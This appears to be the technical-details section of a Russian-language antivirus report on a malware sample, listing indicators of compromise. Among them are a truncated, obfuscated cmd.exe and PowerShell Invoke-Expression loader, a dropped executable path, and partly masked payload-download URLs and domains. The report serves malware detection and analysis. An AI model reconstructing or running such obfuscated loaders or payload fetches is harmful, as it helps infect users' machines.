Техническая информация
- '<SYSTEM32>\cmd.exe' wmic & %comspec% /v /c set %lraUHPzAbsVzHqu%=mCwzLFOfz&&set %wwcJcfEWo%=w^er^s&&set %IDRbWwQjWASfOmf%=PNhqRlilw&&set %fcnuRbKic%=p^o&&set %YnwQduaXMcMEwXd%=ibmcHXPYPQiwYYN&&set %Y...
- C:\users\public\220116.exe
- C:\users\public\220116.exe
- 'mi##zan.com':80
- 'be##t.biz':80
- http://mi##zan.com/e/
- http://mi##zan.com/404.html
- http://be##t.biz/esuBzzmU/
- DNS ASK pr######ole25.edu.konin.pl
- DNS ASK mi##zan.com
- DNS ASK cr######rrencycourse.net
- DNS ASK be##t.biz
- DNS ASK re###t-britv.ru
- '<SYSTEM32>\cmd.exe' wmic & %comspec% /v /c set %lraUHPzAbsVzHqu%=mCwzLFOfz&&set %wwcJcfEWo%=w^er^s&&set %IDRbWwQjWASfOmf%=PNhqRlilw&&set %fcnuRbKic%=p^o&&set %YnwQduaXMcMEwXd%=ibmcHXPYPQiwYYN&&set %Y...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "InVoKe-expRESsioN ( ('((LSW. ((vARiAbLe XVc*MDR*XVc).nAmE[3,11,2]-joInXVcXVc) ((LSW+LSWXVce'+'UXVcLSW+LSW+XVcZfranc = new-'+'XVc+XLSW+LSWVcobXVLSW+LS'+'WcLSW+LSW+XVcjXVc+XVLS'+'W+LSWcect SysXL...